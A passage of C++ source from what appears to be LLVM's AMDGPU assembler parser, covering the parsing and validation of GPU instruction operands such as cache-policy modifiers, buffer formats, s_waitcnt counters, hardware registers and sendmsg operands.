// accessed with s_setreg/s_getreg.
switch (RegNo) {
case AMDGPU::FLAT_SCR:
case AMDGPU::FLAT_SCR_LO:
case AMDGPU::FLAT_SCR_HI:
return false;
default:
return true;
}
}
// VI only has 102 SGPRs, so make sure we aren't trying to use the 2 more that
// SI/CI have.
for (MCRegAliasIterator R(AMDGPU::SGPR102_SGPR103, &MRI, true);
R.isValid(); ++R) {
if (*R == RegNo)
return hasSGPR102_SGPR103();
}
return true;
}
OperandMatchResultTy
AMDGPUAsmParser::parseOperand(OperandVector &Operands, StringRef Mnemonic,
OperandMode Mode) {
// Try to parse with a custom parser
OperandMatchResultTy ResTy = MatchOperandParserImpl(Operands, Mnemonic);
// If we successfully parsed the operand or if there as an error parsing,
// we are done.
//
// If we are parsing after we reach EndOfStatement then this means we
// are appending default values to the Operands list. This is only done
// by custom parser, so we shouldn't continue on to the generic parsing.
if (ResTy == MatchOperand_Success || ResTy == MatchOperand_ParseFail ||
isToken(AsmToken::EndOfStatement))
return ResTy;
SMLoc RBraceLoc;
SMLoc LBraceLoc = getLoc();
if (Mode == OperandMode_NSA && trySkipToken(AsmToken::LBrac)) {
unsigned Prefix = Operands.size();
for (;;) {
auto Loc = getLoc();
ResTy = parseReg(Operands);
if (ResTy == MatchOperand_NoMatch)
Error(Loc, "expected a register");
if (ResTy != MatchOperand_Success)
return MatchOperand_ParseFail;
RBraceLoc = getLoc();
if (trySkipToken(AsmToken::RBrac))
break;
if (!skipToken(AsmToken::Comma,
"expected a comma or a closing square bracket")) {
return MatchOperand_ParseFail;
}
}
if (Operands.size() - Prefix > 1) {
Operands.insert(Operands.begin() + Prefix,
AMDGPUOperand::CreateToken(this, "[", LBraceLoc));
Operands.push_back(AMDGPUOperand::CreateToken(this, "]", RBraceLoc));
}
return MatchOperand_Success;
}
return parseRegOrImm(Operands);
}
StringRef AMDGPUAsmParser::parseMnemonicSuffix(StringRef Name) {
// Clear any forced encodings from the previous instruction.
setForcedEncodingSize(0);
setForcedDPP(false);
setForcedSDWA(false);
if (Name.endswith("_e64")) {
setForcedEncodingSize(64);
return Name.substr(0, Name.size() - 4);
} else if (Name.endswith("_e32")) {
setForcedEncodingSize(32);
return Name.substr(0, Name.size() - 4);
} else if (Name.endswith("_dpp")) {
setForcedDPP(true);
return Name.substr(0, Name.size() - 4);
} else if (Name.endswith("_sdwa")) {
setForcedSDWA(true);
return Name.substr(0, Name.size() - 5);
}
return Name;
}
bool AMDGPUAsmParser::ParseInstruction(ParseInstructionInfo &Info,
StringRef Name,
SMLoc NameLoc, OperandVector &Operands) {
// Add the instruction mnemonic
Name = parseMnemonicSuffix(Name);
Operands.push_back(AMDGPUOperand::CreateToken(this, Name, NameLoc));
bool IsMIMG = Name.startswith("image_");
while (!trySkipToken(AsmToken::EndOfStatement)) {
OperandMode Mode = OperandMode_Default;
if (IsMIMG && isGFX10Plus() && Operands.size() == 2)
Mode = OperandMode_NSA;
CPolSeen = 0;
OperandMatchResultTy Res = parseOperand(Operands, Name, Mode);
if (Res != MatchOperand_Success) {
checkUnsupportedInstruction(Name, NameLoc);
if (!Parser.hasPendingError()) {
// FIXME: use real operand location rather than the current location.
StringRef Msg =
(Res == MatchOperand_ParseFail) ? "failed parsing operand." :
"not a valid operand.";
Error(getLoc(), Msg);
}
while (!trySkipToken(AsmToken::EndOfStatement)) {
lex();
}
return true;
}
// Eat the comma or space if there is one.
trySkipToken(AsmToken::Comma);
}
return false;
}
//===----------------------------------------------------------------------===//
// Utility functions
//===----------------------------------------------------------------------===//
OperandMatchResultTy
AMDGPUAsmParser::parseIntWithPrefix(const char *Prefix, int64_t &IntVal) {
if (!trySkipId(Prefix, AsmToken::Colon))
return MatchOperand_NoMatch;
return parseExpr(IntVal) ? MatchOperand_Success : MatchOperand_ParseFail;
}
OperandMatchResultTy
AMDGPUAsmParser::parseIntWithPrefix(const char *Prefix, OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy,
bool (*ConvertResult)(int64_t&)) {
SMLoc S = getLoc();
int64_t Value = 0;
OperandMatchResultTy Res = parseIntWithPrefix(Prefix, Value);
if (Res != MatchOperand_Success)
return Res;
if (ConvertResult && !ConvertResult(Value)) {
Error(S, "invalid " + StringRef(Prefix) + " value.");
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Value, S, ImmTy));
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseOperandArrayWithPrefix(const char *Prefix,
OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy,
bool (*ConvertResult)(int64_t&)) {
SMLoc S = getLoc();
if (!trySkipId(Prefix, AsmToken::Colon))
return MatchOperand_NoMatch;
if (!skipToken(AsmToken::LBrac, "expected a left square bracket"))
return MatchOperand_ParseFail;
unsigned Val = 0;
const unsigned MaxSize = 4;
// FIXME: How to verify the number of elements matches the number of src
// operands?
for (int I = 0; ; ++I) {
int64_t Op;
SMLoc Loc = getLoc();
if (!parseExpr(Op))
return MatchOperand_ParseFail;
if (Op != 0 && Op != 1) {
Error(Loc, "invalid " + StringRef(Prefix) + " value.");
return MatchOperand_ParseFail;
}
Val |= (Op << I);
if (trySkipToken(AsmToken::RBrac))
break;
if (I + 1 == MaxSize) {
Error(getLoc(), "expected a closing square bracket");
return MatchOperand_ParseFail;
}
if (!skipToken(AsmToken::Comma, "expected a comma"))
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Val, S, ImmTy));
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseNamedBit(StringRef Name, OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy) {
int64_t Bit;
SMLoc S = getLoc();
if (trySkipId(Name)) {
Bit = 1;
} else if (trySkipId("no", Name)) {
Bit = 0;
} else {
return MatchOperand_NoMatch;
}
if (Name == "r128" && !hasMIMG_R128()) {
Error(S, "r128 modifier is not supported on this GPU");
return MatchOperand_ParseFail;
}
if (Name == "a16" && !isGFX9() && !hasGFX10A16()) {
Error(S, "a16 modifier is not supported on this GPU");
return MatchOperand_ParseFail;
}
if (isGFX9() && ImmTy == AMDGPUOperand::ImmTyA16)
ImmTy = AMDGPUOperand::ImmTyR128A16;
Operands.push_back(AMDGPUOperand::CreateImm(this, Bit, S, ImmTy));
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseCPol(OperandVector &Operands) {
unsigned CPolOn = 0;
unsigned CPolOff = 0;
SMLoc S = getLoc();
if (trySkipId("glc"))
CPolOn = AMDGPU::CPol::GLC;
else if (trySkipId("noglc"))
CPolOff = AMDGPU::CPol::GLC;
else if (trySkipId("slc"))
CPolOn = AMDGPU::CPol::SLC;
else if (trySkipId("noslc"))
CPolOff = AMDGPU::CPol::SLC;
else if (trySkipId("dlc"))
CPolOn = AMDGPU::CPol::DLC;
else if (trySkipId("nodlc"))
CPolOff = AMDGPU::CPol::DLC;
else if (trySkipId("scc"))
CPolOn = AMDGPU::CPol::SCC;
else if (trySkipId("noscc"))
CPolOff = AMDGPU::CPol::SCC;
else
return MatchOperand_NoMatch;
if (!isGFX10Plus() && ((CPolOn | CPolOff) & AMDGPU::CPol::DLC)) {
Error(S, "dlc modifier is not supported on this GPU");
return MatchOperand_ParseFail;
}
if (!isGFX90A() && ((CPolOn | CPolOff) & AMDGPU::CPol::SCC)) {
Error(S, "scc modifier is not supported on this GPU");
return MatchOperand_ParseFail;
}
if (CPolSeen & (CPolOn | CPolOff)) {
Error(S, "duplicate cache policy modifier");
return MatchOperand_ParseFail;
}
CPolSeen |= (CPolOn | CPolOff);
for (unsigned I = 1; I != Operands.size(); ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (Op.isCPol()) {
Op.setImm((Op.getImm() | CPolOn) & ~CPolOff);
return MatchOperand_Success;
}
}
Operands.push_back(AMDGPUOperand::CreateImm(this, CPolOn, S,
AMDGPUOperand::ImmTyCPol));
return MatchOperand_Success;
}
static void addOptionalImmOperand(
MCInst& Inst, const OperandVector& Operands,
AMDGPUAsmParser::OptionalImmIndexMap& OptionalIdx,
AMDGPUOperand::ImmTy ImmT,
int64_t Default = 0) {
auto i = OptionalIdx.find(ImmT);
if (i != OptionalIdx.end()) {
unsigned Idx = i->second;
((AMDGPUOperand &)*Operands[Idx]).addImmOperands(Inst, 1);
} else {
Inst.addOperand(MCOperand::createImm(Default));
}
}
OperandMatchResultTy
AMDGPUAsmParser::parseStringWithPrefix(StringRef Prefix,
StringRef &Value,
SMLoc &StringLoc) {
if (!trySkipId(Prefix, AsmToken::Colon))
return MatchOperand_NoMatch;
StringLoc = getLoc();
return parseId(Value, "expected an identifier") ? MatchOperand_Success
: MatchOperand_ParseFail;
}
//===----------------------------------------------------------------------===//
// MTBUF format
//===----------------------------------------------------------------------===//
bool AMDGPUAsmParser::tryParseFmt(const char *Pref,
int64_t MaxVal,
int64_t &Fmt) {
int64_t Val;
SMLoc Loc = getLoc();
auto Res = parseIntWithPrefix(Pref, Val);
if (Res == MatchOperand_ParseFail)
return false;
if (Res == MatchOperand_NoMatch)
return true;
if (Val < 0 || Val > MaxVal) {
Error(Loc, Twine("out of range ", StringRef(Pref)));
return false;
}
Fmt = Val;
return true;
}
// dfmt and nfmt (in a tbuffer instruction) are parsed as one to allow their
// values to live in a joint format operand in the MCInst encoding.
OperandMatchResultTy
AMDGPUAsmParser::parseDfmtNfmt(int64_t &Format) {
using namespace llvm::AMDGPU::MTBUFFormat;
int64_t Dfmt = DFMT_UNDEF;
int64_t Nfmt = NFMT_UNDEF;
// dfmt and nfmt can appear in either order, and each is optional.
for (int I = 0; I < 2; ++I) {
if (Dfmt == DFMT_UNDEF && !tryParseFmt("dfmt", DFMT_MAX, Dfmt))
return MatchOperand_ParseFail;
if (Nfmt == NFMT_UNDEF && !tryParseFmt("nfmt", NFMT_MAX, Nfmt)) {
return MatchOperand_ParseFail;
}
// Skip optional comma between dfmt/nfmt
// but guard against 2 commas following each other.
if ((Dfmt == DFMT_UNDEF) != (Nfmt == NFMT_UNDEF) &&
!peekToken().is(AsmToken::Comma)) {
trySkipToken(AsmToken::Comma);
}
}
if (Dfmt == DFMT_UNDEF && Nfmt == NFMT_UNDEF)
return MatchOperand_NoMatch;
Dfmt = (Dfmt == DFMT_UNDEF) ? DFMT_DEFAULT : Dfmt;
Nfmt = (Nfmt == NFMT_UNDEF) ? NFMT_DEFAULT : Nfmt;
Format = encodeDfmtNfmt(Dfmt, Nfmt);
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseUfmt(int64_t &Format) {
using namespace llvm::AMDGPU::MTBUFFormat;
int64_t Fmt = UFMT_UNDEF;
if (!tryParseFmt("format", UFMT_MAX, Fmt))
return MatchOperand_ParseFail;
if (Fmt == UFMT_UNDEF)
return MatchOperand_NoMatch;
Format = Fmt;
return MatchOperand_Success;
}
bool AMDGPUAsmParser::matchDfmtNfmt(int64_t &Dfmt,
int64_t &Nfmt,
StringRef FormatStr,
SMLoc Loc) {
using namespace llvm::AMDGPU::MTBUFFormat;
int64_t Format;
Format = getDfmt(FormatStr);
if (Format != DFMT_UNDEF) {
Dfmt = Format;
return true;
}
Format = getNfmt(FormatStr, getSTI());
if (Format != NFMT_UNDEF) {
Nfmt = Format;
return true;
}
Error(Loc, "unsupported format");
return false;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSymbolicSplitFormat(StringRef FormatStr,
SMLoc FormatLoc,
int64_t &Format) {
using namespace llvm::AMDGPU::MTBUFFormat;
int64_t Dfmt = DFMT_UNDEF;
int64_t Nfmt = NFMT_UNDEF;
if (!matchDfmtNfmt(Dfmt, Nfmt, FormatStr, FormatLoc))
return MatchOperand_ParseFail;
if (trySkipToken(AsmToken::Comma)) {
StringRef Str;
SMLoc Loc = getLoc();
if (!parseId(Str, "expected a format string") ||
!matchDfmtNfmt(Dfmt, Nfmt, Str, Loc)) {
return MatchOperand_ParseFail;
}
if (Dfmt == DFMT_UNDEF) {
Error(Loc, "duplicate numeric format");
return MatchOperand_ParseFail;
} else if (Nfmt == NFMT_UNDEF) {
Error(Loc, "duplicate data format");
return MatchOperand_ParseFail;
}
}
Dfmt = (Dfmt == DFMT_UNDEF) ? DFMT_DEFAULT : Dfmt;
Nfmt = (Nfmt == NFMT_UNDEF) ? NFMT_DEFAULT : Nfmt;
if (isGFX10Plus()) {
auto Ufmt = convertDfmtNfmt2Ufmt(Dfmt, Nfmt);
if (Ufmt == UFMT_UNDEF) {
Error(FormatLoc, "unsupported format");
return MatchOperand_ParseFail;
}
Format = Ufmt;
} else {
Format = encodeDfmtNfmt(Dfmt, Nfmt);
}
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSymbolicUnifiedFormat(StringRef FormatStr,
SMLoc Loc,
int64_t &Format) {
using namespace llvm::AMDGPU::MTBUFFormat;
auto Id = getUnifiedFormat(FormatStr);
if (Id == UFMT_UNDEF)
return MatchOperand_NoMatch;
if (!isGFX10Plus()) {
Error(Loc, "unified format is not supported on this GPU");
return MatchOperand_ParseFail;
}
Format = Id;
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseNumericFormat(int64_t &Format) {
using namespace llvm::AMDGPU::MTBUFFormat;
SMLoc Loc = getLoc();
if (!parseExpr(Format))
return MatchOperand_ParseFail;
if (!isValidFormatEncoding(Format, getSTI())) {
Error(Loc, "out of range format");
return MatchOperand_ParseFail;
}
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSymbolicOrNumericFormat(int64_t &Format) {
using namespace llvm::AMDGPU::MTBUFFormat;
if (!trySkipId("format", AsmToken::Colon))
return MatchOperand_NoMatch;
if (trySkipToken(AsmToken::LBrac)) {
StringRef FormatStr;
SMLoc Loc = getLoc();
if (!parseId(FormatStr, "expected a format string"))
return MatchOperand_ParseFail;
auto Res = parseSymbolicUnifiedFormat(FormatStr, Loc, Format);
if (Res == MatchOperand_NoMatch)
Res = parseSymbolicSplitFormat(FormatStr, Loc, Format);
if (Res != MatchOperand_Success)
return Res;
if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
return MatchOperand_ParseFail;
return MatchOperand_Success;
}
return parseNumericFormat(Format);
}
OperandMatchResultTy
AMDGPUAsmParser::parseFORMAT(OperandVector &Operands) {
using namespace llvm::AMDGPU::MTBUFFormat;
int64_t Format = getDefaultFormatEncoding(getSTI());
OperandMatchResultTy Res;
SMLoc Loc = getLoc();
// Parse legacy format syntax.
Res = isGFX10Plus() ? parseUfmt(Format) : parseDfmtNfmt(Format);
if (Res == MatchOperand_ParseFail)
return Res;
bool FormatFound = (Res == MatchOperand_Success);
Operands.push_back(
AMDGPUOperand::CreateImm(this, Format, Loc, AMDGPUOperand::ImmTyFORMAT));
if (FormatFound)
trySkipToken(AsmToken::Comma);
if (isToken(AsmToken::EndOfStatement)) {
// We are expecting an soffset operand,
// but let matcher handle the error.
return MatchOperand_Success;
}
// Parse soffset.
Res = parseRegOrImm(Operands);
if (Res != MatchOperand_Success)
return Res;
trySkipToken(AsmToken::Comma);
if (!FormatFound) {
Res = parseSymbolicOrNumericFormat(Format);
if (Res == MatchOperand_ParseFail)
return Res;
if (Res == MatchOperand_Success) {
auto Size = Operands.size();
AMDGPUOperand &Op = static_cast<AMDGPUOperand &>(*Operands[Size - 2]);
assert(Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyFORMAT);
Op.setImm(Format);
}
return MatchOperand_Success;
}
if (isId("format") && peekToken().is(AsmToken::Colon)) {
Error(getLoc(), "duplicate format");
return MatchOperand_ParseFail;
}
return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// ds
//===----------------------------------------------------------------------===//
void AMDGPUAsmParser::cvtDSOffset01(MCInst &Inst,
const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
continue;
}
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset0);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset1);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyGDS);
Inst.addOperand(MCOperand::createReg(AMDGPU::M0)); // m0
}
void AMDGPUAsmParser::cvtDSImpl(MCInst &Inst, const OperandVector &Operands,
bool IsGdsHardcoded) {
OptionalImmIndexMap OptionalIdx;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
continue;
}
if (Op.isToken() && Op.getToken() == "gds") {
IsGdsHardcoded = true;
continue;
}
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
AMDGPUOperand::ImmTy OffsetType =
(Inst.getOpcode() == AMDGPU::DS_SWIZZLE_B32_gfx10 ||
Inst.getOpcode() == AMDGPU::DS_SWIZZLE_B32_gfx6_gfx7 ||
Inst.getOpcode() == AMDGPU::DS_SWIZZLE_B32_vi) ? AMDGPUOperand::ImmTySwizzle :
AMDGPUOperand::ImmTyOffset;
addOptionalImmOperand(Inst, Operands, OptionalIdx, OffsetType);
if (!IsGdsHardcoded) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyGDS);
}
Inst.addOperand(MCOperand::createReg(AMDGPU::M0)); // m0
}
void AMDGPUAsmParser::cvtExp(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
unsigned OperandIdx[4];
unsigned EnMask = 0;
int SrcIdx = 0;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
assert(SrcIdx < 4);
OperandIdx[SrcIdx] = Inst.size();
Op.addRegOperands(Inst, 1);
++SrcIdx;
continue;
}
if (Op.isOff()) {
assert(SrcIdx < 4);
OperandIdx[SrcIdx] = Inst.size();
Inst.addOperand(MCOperand::createReg(AMDGPU::NoRegister));
++SrcIdx;
continue;
}
if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyExpTgt) {
Op.addImmOperands(Inst, 1);
continue;
}
if (Op.isToken() && Op.getToken() == "done")
continue;
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
assert(SrcIdx == 4);
bool Compr = false;
if (OptionalIdx.find(AMDGPUOperand::ImmTyExpCompr) != OptionalIdx.end()) {
Compr = true;
Inst.getOperand(OperandIdx[1]) = Inst.getOperand(OperandIdx[2]);
Inst.getOperand(OperandIdx[2]).setReg(AMDGPU::NoRegister);
Inst.getOperand(OperandIdx[3]).setReg(AMDGPU::NoRegister);
}
for (auto i = 0; i < SrcIdx; ++i) {
if (Inst.getOperand(OperandIdx[i]).getReg() != AMDGPU::NoRegister) {
EnMask |= Compr? (0x3 << i * 2) : (0x1 << i);
}
}
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyExpVM);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyExpCompr);
Inst.addOperand(MCOperand::createImm(EnMask));
}
//===----------------------------------------------------------------------===//
// s_waitcnt
//===----------------------------------------------------------------------===//
static bool
encodeCnt(
const AMDGPU::IsaVersion ISA,
int64_t &IntVal,
int64_t CntVal,
bool Saturate,
unsigned (*encode)(const IsaVersion &Version, unsigned, unsigned),
unsigned (*decode)(const IsaVersion &Version, unsigned))
{
bool Failed = false;
IntVal = encode(ISA, IntVal, CntVal);
if (CntVal != decode(ISA, IntVal)) {
if (Saturate) {
IntVal = encode(ISA, IntVal, -1);
} else {
Failed = true;
}
}
return Failed;
}
bool AMDGPUAsmParser::parseCnt(int64_t &IntVal) {
SMLoc CntLoc = getLoc();
StringRef CntName = getTokenStr();
if (!skipToken(AsmToken::Identifier, "expected a counter name") ||
!skipToken(AsmToken::LParen, "expected a left parenthesis"))
return false;
int64_t CntVal;
SMLoc ValLoc = getLoc();
if (!parseExpr(CntVal))
return false;
AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
bool Failed = true;
bool Sat = CntName.endswith("_sat");
if (CntName == "vmcnt" || CntName == "vmcnt_sat") {
Failed = encodeCnt(ISA, IntVal, CntVal, Sat, encodeVmcnt, decodeVmcnt);
} else if (CntName == "expcnt" || CntName == "expcnt_sat") {
Failed = encodeCnt(ISA, IntVal, CntVal, Sat, encodeExpcnt, decodeExpcnt);
} else if (CntName == "lgkmcnt" || CntName == "lgkmcnt_sat") {
Failed = encodeCnt(ISA, IntVal, CntVal, Sat, encodeLgkmcnt, decodeLgkmcnt);
} else {
Error(CntLoc, "invalid counter name " + CntName);
return false;
}
if (Failed) {
Error(ValLoc, "too large value for " + CntName);
return false;
}
if (!skipToken(AsmToken::RParen, "expected a closing parenthesis"))
return false;
if (trySkipToken(AsmToken::Amp) || trySkipToken(AsmToken::Comma)) {
if (isToken(AsmToken::EndOfStatement)) {
Error(getLoc(), "expected a counter name");
return false;
}
}
return true;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSWaitCntOps(OperandVector &Operands) {
AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
int64_t Waitcnt = getWaitcntBitMask(ISA);
SMLoc S = getLoc();
if (isToken(AsmToken::Identifier) && peekToken().is(AsmToken::LParen)) {
while (!isToken(AsmToken::EndOfStatement)) {
if (!parseCnt(Waitcnt))
return MatchOperand_ParseFail;
}
} else {
if (!parseExpr(Waitcnt))
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Waitcnt, S));
return MatchOperand_Success;
}
bool
AMDGPUOperand::isSWaitCnt() const {
return isImm();
}
//===----------------------------------------------------------------------===//
// hwreg
//===----------------------------------------------------------------------===//
bool
AMDGPUAsmParser::parseHwregBody(OperandInfoTy &HwReg,
OperandInfoTy &Offset,
OperandInfoTy &Width) {
using namespace llvm::AMDGPU::Hwreg;
// The register may be specified by name or using a numeric code
HwReg.Loc = getLoc();
if (isToken(AsmToken::Identifier) &&
(HwReg.Id = getHwregId(getTokenStr(), getSTI())) >= 0) {
HwReg.IsSymbolic = true;
lex(); // skip register name
} else if (!parseExpr(HwReg.Id, "a register name")) {
return false;
}
if (trySkipToken(AsmToken::RParen))
return true;
// parse optional params
if (!skipToken(AsmToken::Comma, "expected a comma or a closing parenthesis"))
return false;
Offset.Loc = getLoc();
if (!parseExpr(Offset.Id))
return false;
if (!skipToken(AsmToken::Comma, "expected a comma"))
return false;
Width.Loc = getLoc();
return parseExpr(Width.Id) &&
skipToken(AsmToken::RParen, "expected a closing parenthesis");
}
bool
AMDGPUAsmParser::validateHwreg(const OperandInfoTy &HwReg,
const OperandInfoTy &Offset,
const OperandInfoTy &Width) {
using namespace llvm::AMDGPU::Hwreg;
if (HwReg.IsSymbolic && !isValidHwreg(HwReg.Id, getSTI())) {
Error(HwReg.Loc,
"specified hardware register is not supported on this GPU");
return false;
}
if (!isValidHwreg(HwReg.Id)) {
Error(HwReg.Loc,
"invalid code of hardware register: only 6-bit values are legal");
return false;
}
if (!isValidHwregOffset(Offset.Id)) {
Error(Offset.Loc, "invalid bit offset: only 5-bit values are legal");
return false;
}
if (!isValidHwregWidth(Width.Id)) {
Error(Width.Loc,
"invalid bitfield width: only values from 1 to 32 are legal");
return false;
}
return true;
}
OperandMatchResultTy
AMDGPUAsmParser::parseHwreg(OperandVector &Operands) {
using namespace llvm::AMDGPU::Hwreg;
int64_t ImmVal = 0;
SMLoc Loc = getLoc();
if (trySkipId("hwreg", AsmToken::LParen)) {
OperandInfoTy HwReg(ID_UNKNOWN_);
OperandInfoTy Offset(OFFSET_DEFAULT_);
OperandInfoTy Width(WIDTH_DEFAULT_);
if (parseHwregBody(HwReg, Offset, Width) &&
validateHwreg(HwReg, Offset, Width)) {
ImmVal = encodeHwreg(HwReg.Id, Offset.Id, Width.Id);
} else {
return MatchOperand_ParseFail;
}
} else if (parseExpr(ImmVal, "a hwreg macro")) {
if (ImmVal < 0 || !isUInt<16>(ImmVal)) {
Error(Loc, "invalid immediate: only 16-bit values are legal");
return MatchOperand_ParseFail;
}
} else {
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, ImmVal, Loc, AMDGPUOperand::ImmTyHwreg));
return MatchOperand_Success;
}
bool AMDGPUOperand::isHwreg() const {
return isImmTy(ImmTyHwreg);
}
//===----------------------------------------------------------------------===//
// sendmsg
//===----------------------------------------------------------------------===//
bool
AMDGPUAsmParser::parseSendMsgBody(OperandInfoTy &Msg,
OperandInfoTy &Op,
OperandInfoTy &Stream) {
using namespace llvm::AMDGPU::SendMsg;
Msg.Loc = getLoc();
if (isToken(AsmToken::Identifier) && (Msg.Id = getMsgId(getTokenStr())) >= 0) {
Msg.IsSymbolic = true;
lex(); // skip message name
} else if (!parseExpr(Msg.Id, "a message name")) {
return false;
}
if (trySkipToken(AsmToken::Comma)) {
Op.IsDefined = true;
Op.Loc = getLoc();
if (isToken(AsmToken::Identifier) &&
(Op.Id = getMsgOpId(Msg.Id, getTokenStr())) >= 0) {
lex(); // skip operation name
} else if (!parseExpr(Op.Id, "an operation name")) {
return false;
}
if (trySkipToken(AsmToken::Comma)) {
Stream.IsDefined = true;
Stream.Loc = getLoc();
if (!parseExpr(Stream.Id))
return false;
}
}
return skipToken(AsmToken::RParen, "expected a closing parenthesis");
}
bool
AMDGPUAsmParser::validateSendMsg(const OperandInfoTy &Msg,
const OperandInfoTy &Op,
const OperandInfoTy &Stream) {
using namespace llvm::AMDGPU::SendMsg;
// Validation strictness depends on whether message is specified
// in a symbolic or in a numeric form. In the latter case
// only encoding possibility is checked.
bool Strict = Msg.IsSymbolic;
if (!isValidMsgId(Msg.Id, getSTI(), Strict)) {
Error(Msg.Loc, "invalid message id");
return false;
}
if (Strict && (msgRequiresOp(Msg.Id) != Op.IsDefined)) {
if (Op.IsDefined) {
Error(Op.Loc, "message does not support operations");
} else {
Error(Msg.Loc, "missing message operation");
}
return false;
}
if (!isValidMsgOp(Msg.Id, Op.Id, getSTI(), Strict)) {
Error(Op.Loc, "invalid operation id");
return false;
}
if (Strict && !msgSupportsStream(Msg.Id, Op.Id) && Stream.IsDefined) {
Error(Stream.Loc, "message operation does not support streams");
return false;
}
if (!isValidMsgStream(Msg.Id, Op.Id, Stream.Id, getSTI(), Strict)) {
Error(Stream.Loc, "invalid message stream id");
return false;
}
return true;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSendMsgOp(OperandVector &Operands) {
using namespace llvm::AMDGPU::SendMsg;
int64_t ImmVal = 0;
SMLoc Loc = getLoc();
if (trySkipId("sendmsg", AsmToken::LParen)) {
OperandInfoTy Msg(ID_UNKNOWN_);
OperandInfoTy Op(OP_NONE_);
OperandInfoTy Stream(STREAM_ID_NONE_);
if (parseSendMsgBody(Msg, Op, Stream) &&
validateSendMsg(Msg, Op, Stream)) {
ImmVal = encodeMsg(Msg.Id, Op.Id, Stream.Id);
} else {
return MatchOperand_ParseFail;
}
} else if (parseExpr(ImmVal, "a sendmsg macro")) {
if (ImmVal < 0 || !isUInt<16>(ImmVal)) {
Error(Loc, "invalid immediate: only 16-bit values are legal");
return MatchOperand_ParseFail;
}
} else {
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, ImmVal, Loc, AMDGPUOperand::ImmTySendMsg));
return MatchOperand_Success;
}
bool AMDGPUOperand::isSendMsg() const {
return isImmTy(ImmTySendMsg);
}
//===----------------------------------------------------------------------===//
// v_interp
//===----------------------------------------------------------------------===//
OperandMatchResultTy AMDGPUAsmParser::parseInterpSlot(OperandVector &Operands) {
StringRef Str;
SMLoc S = getLoc();
if (!parseId(Str))
return MatchOperand_NoMatch;
int Slot = StringSwitch<int>(Str)
.Case("p10", 0)
.Case("p20", 1)
.Case("p0", 2)
.Default(-1);
if (Slot == -1) {
Error(S, "invalid interpolation slot");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Slot, S,
AMDGPUOperand::ImmTyInterpSlot));
return MatchOperand_Success;
}
OperandMatchResultTy AMDGPUAsmParser::parseInterpAttr(OperandVector &Operands) {
StringRef Str;
SMLoc S = getLoc();
if (!parseId(Str))
return MatchOperand_NoMatch;
if (!Str.startswith("attr")) {
Error(S, "invalid interpolation attribute");
return MatchOperand_ParseFail;
}
StringRef Chan = Str.take_back(2);
int AttrChan = StringSwitch<int>(Chan)
.Case(".x", 0)
.Case(".y", 1)
.Case(".z", 2)
.Case(".w", 3)
.Default(-1);
if (AttrChan == -1) {
Error(S, "invalid or missing interpolation attribute channel");
return MatchOperand_ParseFail;
}
Str = Str.drop_back(2).drop_front(4);
uint8_t Attr;
if (Str.getAsInteger(10, Attr)) {
Error(S, "invalid or missing interpolation attribute number");
return MatchOperand_ParseFail;
}
if (Attr > 63) {
Error(S, "out of bounds interpolation attribute number");
return MatchOperand_ParseFail;
}
SMLoc SChan = SMLoc::getFromPointer(Chan.data());
Operands.push_back(AMDGPUOperand::CreateImm(this, Attr, S,
AMDGPUOperand::ImmTyInterpAttr));
Operands.push_back(AMDGPUOperand::CreateImm(this, AttrChan, SChan,
AMDGPUOperand::ImmTyAttrChan));
return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// exp
//===----------------------------------------------------------------------===//
OperandMatchResultTy AMDGPUAsmParser::parseExpTgt(OperandVector &Operands) {
